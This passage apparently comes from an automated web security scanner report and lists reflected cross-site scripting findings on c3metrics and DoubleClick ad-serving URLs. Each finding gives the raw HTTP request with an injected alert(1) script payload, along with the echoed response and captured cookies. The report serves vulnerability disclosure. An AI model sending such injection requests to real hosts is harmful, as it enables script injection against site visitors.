GET /v.js?id=adver&cid=480a06dd<script>alert(1)</script>49f90eb1dd2&t=72 HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?uilKAFF8CQD5Q0gAAAAAAFufCgAAAAAAAgAAAAYAAAAAAP8AAAAFCW8VDwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABgyQQAAAAAAAIAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABa8F1Eo8UUCvN5p9OBJ4HIO6F18GIqSmJVEsk5AAAAAA==,,http%3A%2F%2Fwww.mysuburbanlife.com%2Flyons%2Flifestyle%2Fentertainment%2Fx1539859994%2Fto-do-tonight-watch-american-idol-priest-opens-friday-the-13th,Z%3D728x90%26s%3D621649%26_salt%3D1477449765%26B%3D10%26u%3Dhttp%253A%252F%252Fwww.mysuburbanlife.com%252Flyons%252Flifestyle%252Fentertainment%252Fx1539859994%252FTo-do-tonight-Watch-American-Idol-Priest-opens-Friday-the-13th%26r%3D0,1c5cab68-7c9c-11e0-acd7-cb9ffa1aa3ae
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52; 480-SM=adver_05-02-2011-12-46-04; 480-VT=aol_05-05-2011-12-43-39_11076048371304599419ZZZZadver_05-11-2011-14-59-16_8816927001305125956ZZZZadcon_05-11-2011-14-59-56_9087559411305125996

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:33:43 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Content-Length: 1049
Connection: close
Content-Type: text/html
Set-Cookie: SERVERID=s14; path=/
Cache-control: private

if(!window.c3VTconstVal){c3VTconstVals={c3VJSconst:{c3VJSscriptLimit:0,c3VJScollection:new Array(),c3VJSurl:'v.js',c3VTJSurl:'c3VTabstrct-6-2.php'}};window.c3VTconstVal=c3VTconstVals}if(!window.fireC3VTJSobj){function fireC3VTJS(){this.fireCall=function(){var a=c3VTconstVal.c3VJSconst.c3VJSurl+'.*$';var b=c3VTconstVal.c3VJSconst.c3VTJSurl+"?id=adver&cid=480a06dd<script>alert(1)</script>49f90eb1dd2&t=72&rv=&uid=&td=";var c=document.getElementsByTagName('script')[0];var e=document.createElement('script');e.type='text/javascript';e.async=true;e.src='http://480-adver-view.c3metrics.com/'+b;var r=ne
...[SNIP]...
2.8. http://480-adver-view.c3metrics.com/v.js [id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://480-adver-view.c3metrics.com
Path:   /v.js

Issue detail

The value of the id request parameter is copied into the HTML document as plain text between tags. The payload e1bdb<script>alert(1)</script>2e525f817b was submitted in the id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v.js?id=advere1bdb<script>alert(1)</script>2e525f817b&cid=480&t=72 HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?uilKAFF8CQD5Q0gAAAAAAFufCgAAAAAAAgAAAAYAAAAAAP8AAAAFCW8VDwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABgyQQAAAAAAAIAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABa8F1Eo8UUCvN5p9OBJ4HIO6F18GIqSmJVEsk5AAAAAA==,,http%3A%2F%2Fwww.mysuburbanlife.com%2Flyons%2Flifestyle%2Fentertainment%2Fx1539859994%2Fto-do-tonight-watch-american-idol-priest-opens-friday-the-13th,Z%3D728x90%26s%3D621649%26_salt%3D1477449765%26B%3D10%26u%3Dhttp%253A%252F%252Fwww.mysuburbanlife.com%252Flyons%252Flifestyle%252Fentertainment%252Fx1539859994%252FTo-do-tonight-Watch-American-Idol-Priest-opens-Friday-the-13th%26r%3D0,1c5cab68-7c9c-11e0-acd7-cb9ffa1aa3ae
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52; 480-SM=adver_05-02-2011-12-46-04; 480-VT=aol_05-05-2011-12-43-39_11076048371304599419ZZZZadver_05-11-2011-14-59-16_8816927001305125956ZZZZadcon_05-11-2011-14-59-56_9087559411305125996

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:33:42 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Content-Length: 1048
Connection: close
Content-Type: text/html
Set-Cookie: SERVERID=s8; path=/
Cache-control: private

if(!window.c3VTconstVal){c3VTconstVals={c3VJSconst:{c3VJSscriptLimit:0,c3VJScollection:new Array(),c3VJSurl:'v.js',c3VTJSurl:'c3VTabstrct-6-2.php'}};window.c3VTconstVal=c3VTconstVals}if(!window.fireC3VTJSobj){function fireC3VTJS(){this.fireCall=function(){var a=c3VTconstVal.c3VJSconst.c3VJSurl+'.*$';var b=c3VTconstVal.c3VJSconst.c3VTJSurl+"?id=advere1bdb<script>alert(1)</script>2e525f817b&cid=480&t=72&rv=&uid=&td=";var c=document.getElementsByTagName('script')[0];var e=document.createElement('script');e.type='text/javascript';e.async=true;e.src='http://480-adver-view.c3metrics.com/'+b;
...[SNIP]...
2.9. http://480-adver-view.c3metrics.com/v.js [t parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://480-adver-view.c3metrics.com
Path:   /v.js

Issue detail

The value of the t request parameter is copied into the HTML document as plain text between tags. The payload d16cc<script>alert(1)</script>85e60d966a9 was submitted in the t parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v.js?id=adver&cid=480&t=72d16cc<script>alert(1)</script>85e60d966a9 HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?uilKAFF8CQD5Q0gAAAAAAFufCgAAAAAAAgAAAAYAAAAAAP8AAAAFCW8VDwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABgyQQAAAAAAAIAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABa8F1Eo8UUCvN5p9OBJ4HIO6F18GIqSmJVEsk5AAAAAA==,,http%3A%2F%2Fwww.mysuburbanlife.com%2Flyons%2Flifestyle%2Fentertainment%2Fx1539859994%2Fto-do-tonight-watch-american-idol-priest-opens-friday-the-13th,Z%3D728x90%26s%3D621649%26_salt%3D1477449765%26B%3D10%26u%3Dhttp%253A%252F%252Fwww.mysuburbanlife.com%252Flyons%252Flifestyle%252Fentertainment%252Fx1539859994%252FTo-do-tonight-Watch-American-Idol-Priest-opens-Friday-the-13th%26r%3D0,1c5cab68-7c9c-11e0-acd7-cb9ffa1aa3ae
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52; 480-SM=adver_05-02-2011-12-46-04; 480-VT=aol_05-05-2011-12-43-39_11076048371304599419ZZZZadver_05-11-2011-14-59-16_8816927001305125956ZZZZadcon_05-11-2011-14-59-56_9087559411305125996

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:33:43 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Content-Length: 1049
Connection: close
Content-Type: text/html
Set-Cookie: SERVERID=s11; path=/
Cache-control: private

if(!window.c3VTconstVal){c3VTconstVals={c3VJSconst:{c3VJSscriptLimit:0,c3VJScollection:new Array(),c3VJSurl:'v.js',c3VTJSurl:'c3VTabstrct-6-2.php'}};window.c3VTconstVal=c3VTconstVals}if(!window.fireC3VTJSobj){function fireC3VTJS(){this.fireCall=function(){var a=c3VTconstVal.c3VJSconst.c3VJSurl+'.*$';var b=c3VTconstVal.c3VJSconst.c3VTJSurl+"?id=adver&cid=480&t=72d16cc<script>alert(1)</script>85e60d966a9&rv=&uid=&td=";var c=document.getElementsByTagName('script')[0];var e=document.createElement('script');e.type='text/javascript';e.async=true;e.src='http://480-adver-view.c3metrics.com/'+b;var r=new Reg
...[SNIP]...
2.10. http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5 [b parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1260.cnetzdnet/B5448313.5

Issue detail

The value of the b request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ce280"-alert(1)-"57eeb56e770 was submitted in the b parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N1260.cnetzdnet/B5448313.5;sz=300x250;pc=cbs513717;click0=http://adlog.com.com/adlog/e/r=8041&sg=513717&o=6037%253A13616%253A&h=cn&p=&b=2ce280"-alert(1)-"57eeb56e770&l=&site=2&pt=2100&nd=13616&pid=&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=2011.05.12.13.27.52&event=58/;ord=2011.05.12.13.27.52? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.zdnet.com/blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Thu, 12 May 2011 13:30:24 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7210

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Tue Jan 25 16:39:33
...[SNIP]...
q%3B240571327%3B0-0%3B0%3B62874418%3B4307-300/250%3B40422013/40439800/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs513717%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8041&sg=513717&o=6037%253A13616%253A&h=cn&p=&b=2ce280"-alert(1)-"57eeb56e770&l=&site=2&pt=2100&nd=13616&pid=&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=2011.0
...[SNIP]...
2.11. http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5 [cid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1260.cnetzdnet/B5448313.5

Issue detail

The value of the cid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6a895"-alert(1)-"c9be2eb186c was submitted in the cid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N1260.cnetzdnet/B5448313.5;sz=300x250;pc=cbs513717;click0=http://adlog.com.com/adlog/e/r=8041&sg=513717&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=2075956a895"-alert(1)-"c9be2eb186c&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=2011.05.12.13.27.52&event=58/;ord=2011.05.12.13.27.52? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.zdnet.com/blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Thu, 12 May 2011 13:31:44 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7210

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Tue Jan 25 16:39:33
...[SNIP]...
00/250%3B40422013/40439800/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs513717%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8041&sg=513717&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=2075956a895"-alert(1)-"c9be2eb186c&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=2011.05.12.13.27.52&event=58/http://www.cdw.com/c
...[SNIP]...
2.12. http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5 [count parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1260.cnetzdnet/B5448313.5

Issue detail

The value of the count request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ec34a"-alert(1)-"28d6349bcd5 was submitted in the count parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N1260.cnetzdnet/B5448313.5;sz=300x250;pc=cbs513717;click0=http://adlog.com.com/adlog/e/r=8041&sg=513717&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=ec34a"-alert(1)-"28d6349bcd5&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=2011.05.12.13.27.52&event=58/;ord=2011.05.12.13.27.52? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.zdnet.com/blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Thu, 12 May 2011 13:33:22 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7210

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Tue Jan 25 16:39:33
...[SNIP]...
log/e/r=8041&sg=513717&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=ec34a"-alert(1)-"28d6349bcd5&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=2011.05.12.13.27.52&event=58/http://www.cdw.com/content/solutions/network-optimization/?cm_mmc=OnlineAds_Q22011%7CCDW%7CMedlar-_-CNET%2FZDNET-_-96463%7
...[SNIP]...
2.13. http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5 [cpnmodule parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1260.cnetzdnet/B5448313.5

Issue detail

The value of the cpnmodule request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1c739"-alert(1)-"9f1133c0075 was submitted in the cpnmodule parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N1260.cnetzdnet/B5448313.5;sz=300x250;pc=cbs513717;click0=http://adlog.com.com/adlog/e/r=8041&sg=513717&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=1c739"-alert(1)-"9f1133c0075&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=2011.05.12.13.27.52&event=58/;ord=2011.05.12.13.27.52? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.zdnet.com/blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Thu, 12 May 2011 13:33:12 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7210

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Tue Jan 25 16:39:33
...[SNIP]...
.com/adlog/e/r=8041&sg=513717&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=1c739"-alert(1)-"9f1133c0075&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=2011.05.12.13.27.52&event=58/http://www.cdw.com/content/solutions/network-optimization/?cm_mmc=OnlineAds_Q22011%7CCDW%7CMedlar-_-CNET%2FZDNET-_-
...[SNIP]...
2.14. http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5 [e parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1260.cnetzdnet/B5448313.5

Issue detail

The value of the e request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bcb27"-alert(1)-"f2620025354 was submitted in the e parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N1260.cnetzdnet/B5448313.5;sz=300x250;pc=cbs513717;click0=http://adlog.com.com/adlog/e/r=8041&sg=513717&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=207595&pp=100&e=bcb27"-alert(1)-"f2620025354&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=2011.05.12.13.27.52&event=58/;ord=2011.05.12.13.27.52? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.zdnet.com/blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Thu, 12 May 2011 13:32:04 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7210

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Tue Jan 25 16:39:33
...[SNIP]...
0422013/40439800/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs513717%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8041&sg=513717&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=207595&pp=100&e=bcb27"-alert(1)-"f2620025354&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=2011.05.12.13.27.52&event=58/http://www.cdw.com/content/sol
...[SNIP]...
2.15. http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5 [epartner parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1260.cnetzdnet/B5448313.5

Issue detail

The value of the epartner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 835f0"-alert(1)-"b57ef62ecd6 was submitted in the epartner parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N1260.cnetzdnet/B5448313.5;sz=300x250;pc=cbs513717;click0=http://adlog.com.com/adlog/e/r=8041&sg=513717&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=835f0"-alert(1)-"b57ef62ecd6&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=2011.05.12.13.27.52&event=58/;ord=2011.05.12.13.27.52? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.zdnet.com/blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
